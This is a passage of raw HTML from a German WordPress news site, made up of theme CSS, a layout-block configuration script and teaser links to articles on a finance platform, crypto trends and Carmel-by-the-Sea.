  1900. <style>.tdi_163{text-align:left!important}.tdi_163 .tdm-descr{color:#000000;font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_163 .tdm-descr{font-size:26px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_163 .tdm-descr{font-size:20px!important}}</style><p class="tdm-descr">Essen & Reisen</p></div><div class="tdm_block td_block_wrap tdm_block_button tdi_164 tdm-block-button-inline tdm-content-horiz-right td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_164"     >
  1901. <style>.tdi_164{margin-right:-24px!important}@media (min-width:768px) and (max-width:1018px){.tdi_164{margin-right:-15px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_164{margin-right:-20px!important}}@media (max-width:767px){.tdi_164{margin-right:0px!important}}</style>
  1902. <style>.tdi_164{float:right;clear:none}.tdi_164 .tdm-btn-icon{position:relative;top:-1px}</style>
  1903. <style>body .tdi_165 .tdm-btn-text,body .tdi_165 i{color:#ec3535}body .tdi_165 svg{fill:#ec3535}body .tdi_165 svg *{fill:inherit}body .tdi_165:hover .tdm-btn-text,body .tdi_165:hover i{color:#000000;-webkit-text-fill-color:unset;background:transparent;transition:none}body .tdi_165:hover svg{fill:#000000}body .tdi_165:hover svg *{fill:inherit}.tdi_165 i{font-size:20px}.tdi_165 .tdm-btn-icon:last-child{margin-left:10px}.tdi_165{font-family:Work Sans!important;font-size:13px!important;line-height:1.2!important;font-weight:600!important;text-transform:uppercase!important;height:auto}@media (min-width:768px) and (max-width:1018px){.tdi_165 i{font-size:17px}.tdi_165 .tdm-btn-icon:last-child{margin-left:6px}.tdi_165{font-size:12px!important}}</style><div class="tds-button td-fix-index"><a href="category/food/"  title="Alle ansehen" class="tds-button5 tdm-btn tdm-btn-sm tdi_165 " ><span class="tdm-btn-text">Alle ansehen</span><i class="tdm-btn-icon tdc-font-tdmp tdc-font-tdmp-arrow-right"></i></a></div></div></div></div></div></div><div class="td_block_wrap td_flex_block_1 tdi_166 td-pb-border-top td_block_template_1 td_flex_block"  data-td-block-uid="tdi_166" >
  1904. <style>.tdi_166{margin-bottom:22px!important;padding-bottom:20px!important;border-color:#eaeaea!important;border-style:solid!important;border-width:0px 0px 1px 0px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_166{margin-bottom:20px!important;padding-bottom:18px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_166{margin-bottom:18px!important;padding-bottom:15px!important}}@media (max-width:767px){.tdi_166{margin-bottom:22px!important}}</style>
  1905. <style>.tdi_166 .td-image-wrap{padding-bottom:70%}.tdi_166 .entry-thumb{background-position:center 50%}.tdi_166 .td-module-container{flex-direction:column;border-color:#eaeaea!important}.tdi_166 .td-image-container{display:block;order:0;margin-left:0;margin-right:auto}.ie10 .tdi_166 .td-module-meta-info,.ie11 .tdi_166 .td-module-meta-info{flex:auto}body .tdi_166 .td-favorite{font-size:36px;box-shadow:1px 1px 4px 0px rgba(0,0,0,0.2)}.tdi_166 .td-module-meta-info{padding:16px 0 0 0;border-color:#eaeaea}.tdi_166 .td_module_wrap{width:25%;float:left;padding-left:10px;padding-right:10px;padding-bottom:10px;margin-bottom:10px}.rtl .tdi_166 .td_module_wrap{float:right}.tdi_166 .td_block_inner{margin-left:-10px;margin-right:-10px}.tdi_166 .td-module-container:before{bottom:-10px;border-color:#eaeaea}.tdi_166 .td-post-vid-time{display:block}.tdi_166 .td-post-category{margin:0px;padding:0px;background-color:rgba(255,255,255,0);color:#ec3535;border-width:0px;border-style:solid;border-color:#aaa}.tdi_166 .td-post-category:not(.td-post-extra-category){display:none}.tdi_166 .td-author-photo .avatar{width:20px;height:20px;margin-right:6px;border-radius:100%}.tdi_166 .td-excerpt{display:none;margin:0px;column-count:1;column-gap:48px}.tdi_166 .td-audio-player{opacity:1;visibility:visible;height:auto;font-size:13px}.tdi_166 .td-read-more{display:none}.tdi_166 .td-author-date{display:inline}.tdi_166 .entry-review-stars{display:inline-block}.tdi_166 .td-icon-star,.tdi_166 .td-icon-star-empty,.tdi_166 .td-icon-star-half{font-size:15px}.tdi_166 .td-module-comments{display:none}.tdi_166 .td_module_wrap:nth-child(4n+1){clear:both}.tdi_166 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0;padding-bottom:0}.tdi_166 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none}.tdi_166 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_166 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_166 .td-post-author-name a{color:#000000}.tdi_166 .td-post-author-name:hover a{color:#ec3535}.tdi_166 .td-post-date,.tdi_166 .td-post-author-name span{color:#000000}.tdi_166 .td-module-meta-info,.tdi_166 .td-next-prev-wrap{text-align:left}.tdi_166 .td-category-pos-above .td-post-category{align-self:flex-start!important}.tdi_166 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_166 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_166 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_166 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_166 .entry-title{margin:0 0 8px 0;font-family:Work Sans!important;font-size:16px!important;line-height:1.2!important;font-weight:600!important}.tdi_166 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_166 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}.tdi_166 .td-editor-date,.tdi_166 .td-editor-date .td-post-author-name a,.tdi_166 .td-editor-date .entry-date,.tdi_166 .td-module-comments a{font-family:Work Sans!important;font-size:13px!important;line-height:1!important;font-weight:500!important;text-transform:capitalize!important;letter-spacing:-0.5px!important}html:not([class*='ie']) .tdi_166 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_166 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_166 .td-module-meta-info{padding:14px 0 0 0}.tdi_166 .td_module_wrap{padding-left:7.5px;padding-right:7.5px;padding-bottom:7.5px;margin-bottom:7.5px;clear:none!important;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_166 .td_block_inner{margin-left:-7.5px;margin-right:-7.5px}.tdi_166 .td-module-container:before{bottom:-7.5px}.tdi_166 .td-post-author-name{display:none}.tdi_166 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_166 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_166 .td_module_wrap .td-module-container:before{display:block!important}.tdi_166 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_166 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_166 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_166 .entry-title{margin:0 0 6px 0;font-size:14px!important}@media (min-width:768px){.tdi_166 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_166 .td-module-meta-info{padding:12px 0 0 0}.tdi_166 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:5px;margin-bottom:5px;clear:none!important;padding-bottom:5px!important;margin-bottom:5px!important}.tdi_166 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_166 .td-module-container:before{bottom:-5px}.tdi_166 .td-post-author-name{display:none}.tdi_166 .td-icon-star,.tdi_166 .td-icon-star-empty,.tdi_166 .td-icon-star-half{font-size:10px}.tdi_166 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_166 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_166 .td_module_wrap .td-module-container:before{display:block!important}.tdi_166 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_166 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_166 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_166 .entry-title{margin:0 0 4px 0;font-size:13px!important}.tdi_166 .td-editor-date,.tdi_166 .td-editor-date .td-post-author-name a,.tdi_166 .td-editor-date .entry-date,.tdi_166 .td-module-comments a{font-size:12px!important}@media (min-width:768px){.tdi_166 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_166 .td-module-meta-info{max-width:100%}.tdi_166 .td_module_wrap{width:100%;float:left;padding-left:0px;padding-right:0px;padding-bottom:15px;margin-bottom:15px;padding-bottom:15px!important;margin-bottom:15px!important}.rtl .tdi_166 .td_module_wrap{float:right}.tdi_166 .td_block_inner{margin-left:-0px;margin-right:-0px}.tdi_166 .td-module-container:before{bottom:-15px}.tdi_166 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_166 .td_module_wrap .td-module-container:before{display:block!important}.tdi_166 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_166 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_166 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_166 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_166 = new tdBlock();
  1906. block_tdi_166.id = "tdi_166";
  1907. block_tdi_166.atts = '{"modules_on_row":"eyJhbGwiOiIyNSUiLCJwaG9uZSI6IjEwMCUifQ==","limit":"4","modules_category":"above","show_btn":"none","show_excerpt":"eyJwb3J0cmFpdCI6Im5vbmUiLCJhbGwiOiJub25lIn0=","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIxNiIsInBvcnRyYWl0IjoiMTMiLCJsYW5kc2NhcGUiOiIxNCJ9","f_title_font_line_height":"1.2","show_cat":"none","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIxNnB4IDAgMCAwIiwibGFuZHNjYXBlIjoiMTRweCAwIDAgMCIsInBvcnRyYWl0IjoiMTJweCAwIDAgMCJ9","modules_divider":"","image_size":"","meta_info_align":"","image_floated":"","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjIyIiwiYm9yZGVyLWJvdHRvbS13aWR0aCI6IjEiLCJwYWRkaW5nLWJvdHRvbSI6IjIwIiwiYm9yZGVyLWNvbG9yIjoiI2VhZWFlYSIsImRpc3BsYXkiOiIifSwibGFuZHNjYXBlIjp7Im1hcmdpbi1ib3R0b20iOiIyMCIsInBhZGRpbmctYm90dG9tIjoiMTgiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7Im1hcmdpbi1ib3R0b20iOiIxOCIsInBhZGRpbmctYm90dG9tIjoiMTUiLCJkaXNwbGF5IjoiIn0sInBvcnRyYWl0X21heF93aWR0aCI6MTAxOCwicG9ydHJhaXRfbWluX3dpZHRoIjo3NjgsInBob25lIjp7Im1hcmdpbi1ib3R0b20iOiIyMiIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"70","all_modules_space":"eyJwaG9uZSI6IjMwIiwicG9ydHJhaXQiOiIxMCIsImFsbCI6IjIwIiwibGFuZHNjYXBlIjoiMTUifQ==","art_excerpt":"0","art_title":"eyJsYW5kc2NhcGUiOiIwIDAgNnB4IDAiLCJwb3J0cmFpdCI6IjAgMCA0cHggMCIsImFsbCI6IjAgMCA4cHggMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"","show_author":"eyJwb3J0cmFpdCI6Im5vbmUiLCJsYW5kc2NhcGUiOiJub25lIn0=","mc1_el":"10","f_title_font_family":"653","f_title_font_transform":"","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","modules_category_padding":"0","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_category_margin":"0","modules_cat_border":"0","columns":"33.33333333%","columns_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMCIsInBob25lIjoiMCJ9","modules_space1":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMiIsInBob25lIjoiMzAifQ==","hide_image3":"yes","category_ids":"","image_height1":"70","modules_space2":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE2IiwicG9ydHJhaXQiOiIxMCJ9","meta_padding2":"0","art_title1":"eyJhbGwiOiIwIDAgMTJweCAwIiwibGFuZHNjYXBlIjoiMCAwIDEwcHgiLCJwb3J0cmFpdCI6IjAgMCA4cHgifQ==","art_title2":"eyJhbGwiOiIwIDAgOHB4IDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIDAgNnB4IDAifQ==","f_title1_font_family":"456","f_title2_font_family":"653","f_title1_font_size":"eyJhbGwiOiIyNiIsImxhbmRzY2FwZSI6IjE5IiwicG9ydHJhaXQiOiIxNyJ9","f_title1_font_line_height":"1.1","f_title1_font_weight":"600","f_title2_font_weight":"600","f_title1_font_transform":"","f_title2_font_transform":"","title_txt2":"#000000","title_txt_hover2":"#f43f3f","show_excerpt2":"none","show_com2":"none","show_date2":"eyJwb3J0cmFpdCI6Im5vbmUifQ==","show_author2":"none","modules_category3":"","modules_category_margin1":"0","modules_category_margin2":"0","modules_category_padding1":"0","modules_category_padding2":"0","modules_cat_border1":"0","modules_cat_border2":"0","cat_bg2":"rgba(255,255,255,0)","cat_txt2":"#ec3535","author_photo_radius1":"100%","author_photo_radius2":"100%","review_size2":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta1_font_family":"653","f_meta2_font_family":"653","f_meta1_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta1_font_line_height":"1","f_meta1_font_weight":"500","f_meta2_font_weight":"500","f_meta1_font_transform":"capitalize","f_meta2_font_transform":"capitalize","f_meta1_font_spacing":"-0.5","meta_info_align1":"","meta_padding1":"eyJhbGwiOiIyMHB4IDAiLCJsYW5kc2NhcGUiOiIxNXB4IDAiLCJwb3J0cmFpdCI6IjEycHggMCIsInBob25lIjoiMjBweCAwIDAifQ==","show_author1":"eyJsYW5kc2NhcGUiOiJub25lIiwicG9ydHJhaXQiOiJub25lIn0=","show_com1":"none","show_excerpt1":"none","modules_border_size1":"eyJhbGwiOiIwIDAgMXB4IDAiLCJwaG9uZSI6IjAifQ==","show_cat1":"none","show_cat2":"none","author_photo":"yes","f_title2_font_size":"eyJhbGwiOiIxNiIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiIxMyJ9","f_title2_font_line_height":"1.2","f_meta2_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta2_font_line_height":"1","f_meta2_font_spacing":"-0.5","all_underline_color1":"","author_txt":"#000000","author_txt_hover":"#ec3535","date_txt":"#000000","all_underline_color2":"","date_txt2":"#000000","author_photo_radius":"100%","review_size":"eyJhbGwiOiIyLjUiLCJwb3J0cmFpdCI6IjAifQ==","f_meta_font_family":"653","f_meta_font_size":"eyJhbGwiOiIxMyIsInBvcnRyYWl0IjoiMTIifQ==","f_meta_font_line_height":"1","f_meta_font_weight":"500","f_meta_font_transform":"capitalize","f_meta_font_spacing":"-0.5","excl_padd":"3px 5px","excl_margin":"-4px 5px 0 0","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_radius":"2","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","offset":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_width":"","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo_size":"","author_photo_space":"","show_review":"inline-block","review_space":"","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_family":"","f_cat_font_size":"","f_cat_font_line_height":"","f_cat_font_style":"","f_cat_font_weight":"","f_cat_font_transform":"","f_cat_font_spacing":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_style":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_bg_hover":"","cat_txt_hover":"","cat_border":"","cat_border_hover":"","meta_bg":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":3,"header_color":"","color_preset":"","border_top":"","class":"tdi_166","tdc_css_class":"tdi_166","tdc_css_class_style":"tdi_166_rand_style"}';
  1908. block_tdi_166.td_column_number = "3";
  1909. block_tdi_166.block_type = "td_flex_block_1";
  1910. block_tdi_166.post_count = "4";
  1911. block_tdi_166.found_posts = "3784";
  1912. block_tdi_166.header_color = "";
  1913. block_tdi_166.ajax_pagination_infinite_stop = "";
  1914. block_tdi_166.max_num_pages = "946";
  1915. tdBlocksArray.push(block_tdi_166);
  1916. </script><div class="td-block-title-wrap"></div><div id=tdi_166 class="td_block_inner td-mc1-wrap">
  1917.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1918.            <div class="td-module-container td-category-pos-above">
  1919.                                    <div class="td-image-container">
  1920.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" class="td-image-wrap " title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Finanzeno.net-Schafft-Erstklassige-Online-Finanzplattformen-696x392.jpg"  ></span></a></div>                                                                    </div>
  1921.                
  1922.                <div class="td-module-meta-info">
  1923.                                        
  1924.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/finanzeno-net/" rel="bookmark" title="Finanzeno.net Schafft Erstklassige Online-Finanzplattformen">Finanzeno.net Schafft Erstklassige Online-Finanzplattformen</a></h3>
  1925.                    
  1926.                                            <div class="td-editor-date">
  1927.                                                        
  1928.                                                            <span class="td-author-date">
  1929.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-06T17:15:57+02:00" >Mai 6, 2024</time></span>                                                                                                        </span>
  1930.                                                    </div>
  1931.                    
  1932.                    <div class="td-excerpt">Finanzeno.net, ein führender Name im Finanzdienstleistungssektor, setzt weiterhin hohe...</div>
  1933.                    
  1934.                                    </div>
  1935.            </div>
  1936.        </div>
  1937.  
  1938.        
  1939.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1940.            <div class="td-module-container td-category-pos-above">
  1941.                                    <div class="td-image-container">
  1942.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" class="td-image-wrap " title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt."><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/05/Die-letzten-Jahre-waren-fuer-Krypto-Investoren-und-Krypto-Boersenbesitzer-ein-wilder-Ritt.jpg"  ></span></a></div>                                                                    </div>
  1943.                
  1944.                <div class="td-module-meta-info">
  1945.                                        
  1946.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/die-letzten-jahre-waren-fuer-krypto-investoren/" rel="bookmark" title="Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.">Die letzten Jahre waren für Krypto-Investoren und Krypto-Börsenbesitzer ein wilder Ritt.</a></h3>
  1947.                    
  1948.                                            <div class="td-editor-date">
  1949.                                                        
  1950.                                                            <span class="td-author-date">
  1951.                                    <a href="https://nachrichtenmorgen.de/author/mianbunny/" aria-label="author-photo" class="td-author-photo"><img alt='Jack Hobin' src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2096%2096'%3E%3C/svg%3E" data-lazy-srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' data-lazy-src="https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g" /><noscript><img alt='Jack Hobin' src='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=96&#038;d=mm&#038;r=g' srcset='https://secure.gravatar.com/avatar/4624b2a18cdc87016e5d61a41b38a314?s=192&#038;d=mm&#038;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></noscript></a>                                    <span class="td-post-author-name"><a href="https://nachrichtenmorgen.de/author/mianbunny/">Jack Hobin</a> <span>-</span> </span>                                    <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2024-05-04T15:49:51+02:00" >Mai 4, 2024</time></span>                                                                                                        </span>
  1952.                                                    </div>
  1953.                    
  1954.                    <div class="td-excerpt">5 Krypto-Trends, denen man im Jahr 2024 und darüber...</div>
  1955.                    
  1956.                                    </div>
  1957.            </div>
  1958.        </div>
  1959.  
  1960.        
  1961.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1962.            <div class="td-module-container td-category-pos-above">
  1963.                                    <div class="td-image-container">
  1964.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" class="td-image-wrap " title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste"><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-10-696x391.jpg"  ></span></a></div>                                                                    </div>
  1965.                
  1966.                <div class="td-module-meta-info">
  1967.                                        
  1968.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/carmel-by-the-sea/" rel="bookmark" title="Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste">Carmel-by-the-Sea: Ein idyllisches Paradies an der kalifornischen Küste</a></h3>
  1969.                    
  1970.                                            <div class="td-editor-date">
  1971.                                                        
  1972.                                                            <span class="td-author-date">
